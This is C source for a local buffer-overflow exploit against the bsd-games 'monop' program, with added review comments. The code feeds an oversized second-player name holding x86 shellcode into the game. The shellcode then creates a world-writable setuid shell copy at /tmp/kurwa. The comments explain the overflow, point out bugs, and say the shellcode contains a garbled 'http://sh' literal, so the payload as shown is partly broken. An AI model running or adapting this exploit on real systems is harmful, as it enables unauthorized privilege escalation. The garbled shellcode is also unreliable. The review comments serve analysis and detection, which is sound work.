/*
 * U-N-F http://www.u-n-f.com
 * monosex - monop game local exploit - from bsd-games package - by ^sq
 * Second player's name buffer overflow. Based on qobaiashi's u-n-f advisory.
 * Shouts: UNF, wsxz, qobaiashi, sxynx, DragonK, dtorsBob, LSD, s0t4ipv6
 *
 * deltha@slack9:~$ ./monosex
 * MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOW
 * [+] Ret addy: 0x8050102
 * [+] Shellcode addy: 0xbffff2d0
 * uid=102(deltha) gid=20(games) groups=102(deltha)
 * ls:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB12: No such file or directory
 * 459881 -rwsrwxrwx 1 deltha games 628664 Aug 23 01:31 /tmp/kurwa
 *
 * Review notes (what the code below actually shows):
 *  - The defect in the target is an unbounded copy of the second player's
 *    name into a fixed-size buffer; the payload layout (300 bytes of filler
 *    followed by a 4-byte return address) is the classic overwrite of a
 *    saved return address.  A bounded read of the name in the target closes
 *    the hole; per the author's comment below the name lands at a fixed,
 *    executable heap address (which is what `ret` points at), so the whole
 *    thing also depends on a non-randomized, executable heap.
 *  - "Shellcode addy" is the address of the `shellcode` array in THIS
 *    process, not in the target; it is informational only.
 *  - The observable artifact is a world-writable setuid copy of /bin/sh in
 *    /tmp (see the `ls -ila` line above); that is what a /tmp or
 *    file-integrity monitor would catch.
 *  - Several C-level problems are flagged inline (missing NUL terminators,
 *    out-of-bounds reads by fputs, a pointer passed to %x).
 */
/* The header names were lost when this page was extracted; the calls below
 * (popen/printf/fputs, memset/memcpy/strcpy/strcat/strlen, abort) would need
 * stdio.h, string.h and stdlib.h. */
#include
#include
/* size of the scratch buffer used for the "number of players" answer */
#define BUFPIPE 512
/* command string handed to the sh -c stage of the shellcode (see buf layout) */
#define CMD "rm -f /tmp/kurwa; id; cp /bin/sh /tmp/kurwa; chmod 4777 /tmp/kurwa; ls -ila /tmp/kurwa "
/* path of the target binary; popen() runs it through /bin/sh -c */
#define VULN "/usr/games/monop"

/* Entry point.  argc/argv are unused.  Builds the two player-name strings,
 * starts the target with its stdin connected to a pipe, and feeds it the
 * dialogue answers.  Returns 0; calls abort() if popen() failed. */
int main(int argc, char **argv) {
FILE *pr;
char newline[2]="\n";
/* pr is checked for NULL only much later (`if (!pr) abort();`); nothing
 * uses it in between, so this is merely an odd ordering, not a bug. */
pr = popen(VULN,"w");
char asd[BUFPIPE];
/* 93 bytes; only 92 are ever written (memset below), so firstplayer[92] is
 * left uninitialized and fputs(firstplayer, pr) may read an indeterminate
 * byte and past the array -- undefined behavior. */
char firstplayer[93];
/* 300 bytes of payload + 4 bytes of return address; no room for a NUL. */
char buf[300+4];
/* unused */
char env[1024];
/* value written over the saved return address; a plain int copied with
 * memcpy, so it is laid out in host byte order (fine for a local exploit
 * on the same i386 machine, per the int $0x80 in the shellcode). */
int ret = 0x8050102;
/* Two stages: setregid(20,20) (eax=0x47, ebx=ecx=20 -- gid 20 is "games",
 * matching the header output), then a jmp/call pair that leaves %ecx
 * pointing at the bytes following the shellcode and execve()s
 * "/bin//sh" "-c" <those bytes>.  NOTE(review): the `"http://sh"` literal
 * does not match its own comment (pushl $0x68732f2f is a 4-byte operand)
 * nor the jmp displacement 0x22, which adds up only with a 4-byte operand;
 * it looks like damage from the page's rendering, not the author's text. */
char shellcode[] = /* setregid (20,20) shellcode */ "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" "\xcd\x80" /*Lsd sh -c shellcode */ "\xeb\x22" /* jmp */ "\x59" /* popl %ecx */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""http://sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x66\x68""-c" /* pushw $0x632d */ "\x89\xe7" /* movl %esp,%edi */ "\x50" /* pushl %eax */ "\x51" /* pushl %ecx */ "\x57" /* pushl %edi */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd9\xff\xff\xff" /* call */ ;
printf("MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOW\n");
printf("[+] Ret addy: 0x%x\n", ret);
/* A char* passed for %x is a type mismatch (UB); %p is the correct
 * conversion.  The value is this process's address of the array anyway. */
printf("[+] Shellcode addy: 0x%x\n", shellcode);
//firstplayer increment to avoid heap addresses which contains zeros
/* fills 92 of the 93 bytes with 'B'; no terminating NUL is written */
memset(firstplayer, 0x42, 92);
/* buf layout (304 bytes, no NUL anywhere):
 *   [0, 300-len(shellcode)-len(CMD))   0x90 filler
 *   [.., 300-len(CMD))                 shellcode
 *   [.., 300)                          CMD -- the bytes %ecx ends up on
 *   [300, 304)                         ret
 * fputs() stops only at a NUL byte, so fputs(buf, pr) below reads past the
 * end of buf (UB) and whatever follows on the stack is sent to the target
 * as well. */
memset(buf, 0x90, 300);
memcpy(&buf[300], (char *)&ret, 4);
memcpy(&buf[300 - strlen(shellcode) - strlen(CMD)],shellcode,strlen(shellcode));
memcpy(&buf[300 - strlen(CMD)],CMD,strlen(CMD));
if (!pr) abort();
// How many players? 2
strcpy(asd,"2");
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
// Player 1's name:
fputs(firstplayer,pr);
/* asd still holds "2\n" here; each strcat appends another "\n", so the
 * terminator written after player 1 is "2\n\n" and after player 2 it is
 * "2\n\n\n" -- not a bare newline.  Presumably unintended; how the target
 * parses the trailing "2" is not visible from this file. */
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
// Player 2's name: overflow
fputs(buf,pr);
strcat(asd,newline);
fputs(asd,pr);
fflush(pr);
/* return value of pclose (the target's exit status) is discarded */
pclose(pr);
return 0;
}